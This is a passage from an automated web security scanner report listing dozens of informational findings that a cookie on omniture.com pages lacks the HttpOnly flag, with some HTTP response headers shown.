The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.589. http://www.omniture.com/en/products/conversion/testandtarget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/testandtarget

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:53 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.590. http://www.omniture.com/en/products/conversion/testandtarget11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/conversion/testandtarget11

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:10 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.591. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/marketing_integration/closed_loop_marketing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:53 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.592. http://www.omniture.com/en/products/marketing_integration/genesis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/marketing_integration/genesis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:32 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.593. http://www.omniture.com/en/products/marketing_integration/genesis/applications previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/marketing_integration/genesis/applications

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:47 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.594. http://www.omniture.com/en/products/multichannel_analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/multichannel_analytics

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:29 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:29 GMT
Content-Length: 23380
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Business Intelligence Software
...[SNIP]...

12.595. http://www.omniture.com/en/products/multichannel_analytics/insight previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/multichannel_analytics/insight

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:34 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.596. http://www.omniture.com/en/products/multichannel_analytics/insight_retail previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/multichannel_analytics/insight_retail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:31 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.597. http://www.omniture.com/en/products/online_analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.598. http://www.omniture.com/en/products/online_analytics/digitalpulse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics/digitalpulse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:06 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.599. http://www.omniture.com/en/products/online_analytics/discover previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics/discover

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:01 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.600. http://www.omniture.com/en/products/online_analytics/sitecatalyst previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_analytics/sitecatalyst

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:01 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:01 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:01 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:01 GMT; path=/; domain=omniture.com
Content-Length: 41289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Analytics | Web Analytic
...[SNIP]...

12.601. http://www.omniture.com/en/products/online_business_optimization previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_business_optimization

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:58:29 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.602. http://www.omniture.com/en/products/online_marketing_suite previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/online_marketing_suite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:00 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.603. http://www.omniture.com/en/products/open_business_analytics_platform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/open_business_analytics_platform

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.604. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/open_business_analytics_platform/datawarehouse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:04:02 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.605. http://www.omniture.com/en/products/tours previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/tours

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:03:58 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.606. http://www.omniture.com/en/products/visitor_acquisition previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/visitor_acquisition

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.607. http://www.omniture.com/en/products/visitor_acquisition/searchcenter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/products/visitor_acquisition/searchcenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:59:58 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.608. http://www.omniture.com/en/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:13:38 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.609. http://www.omniture.com/en/resources/articles previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/articles

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:58 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.610. http://www.omniture.com/en/resources/case_studies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/case_studies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:27 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.611. http://www.omniture.com/en/resources/cmo.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/cmo.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:37 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.612. http://www.omniture.com/en/resources/guides previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/guides

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:04 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.613. http://www.omniture.com/en/resources/testimonials previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/testimonials

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:50 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.614. http://www.omniture.com/en/resources/webinars previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/webinars

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:13 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.615. http://www.omniture.com/en/services previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 18:57:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.616. http://www.omniture.com/en/services/consulting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services/consulting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.617. http://www.omniture.com/en/services/es previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services/es

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:05:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.618. http://www.omniture.com/en/survey/5084 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/survey/5084

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:50:21 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.619. http://www.omniture.com/en/surveys previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/surveys

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:15:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.620. http://www.omniture.com/es previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/es

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:52:45 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.621. http://www.omniture.com/fr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/fr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:53:26 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.622. http://www.omniture.com/jp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/jp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:54:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.623. http://www.omniture.com/ko previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/ko

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:56:23 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.624. http://www.omniture.com/offer/100 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/100

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:31 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.625. http://www.omniture.com/offer/101 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/101

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:42 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.626. http://www.omniture.com/offer/102 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/102

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:57 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.627. http://www.omniture.com/offer/107 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/107

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:18 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.628. http://www.omniture.com/offer/108 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/108

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:34 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.629. http://www.omniture.com/offer/158 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/158

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:27:55 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.630. http://www.omniture.com/offer/162 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/162

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:27:57 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.631. http://www.omniture.com/offer/17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/17

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:19 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.632. http://www.omniture.com/offer/170 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/170

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:33 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.633. http://www.omniture.com/offer/186 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/186

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:26 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.634. http://www.omniture.com/offer/187 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/187

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.635. http://www.omniture.com/offer/191 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/191

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:36 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.636. http://www.omniture.com/offer/285 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/285

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:26:15 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.637. http://www.omniture.com/offer/286 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/286

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:12 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.638. http://www.omniture.com/offer/291 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/291

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:08 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.639. http://www.omniture.com/offer/301 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/301

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:32:30 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.640. http://www.omniture.com/offer/303 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/303

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.641. http://www.omniture.com/offer/323 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/323

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.642. http://www.omniture.com/offer/331 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/331

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:24:20 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.643. http://www.omniture.com/offer/335 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/335

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:12 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.644. http://www.omniture.com/offer/337 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/337

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:07 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.645. http://www.omniture.com/offer/357 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/357

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:03 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.646. http://www.omniture.com/offer/372 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/372

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:44 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.647. http://www.omniture.com/offer/400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/400

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:26:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

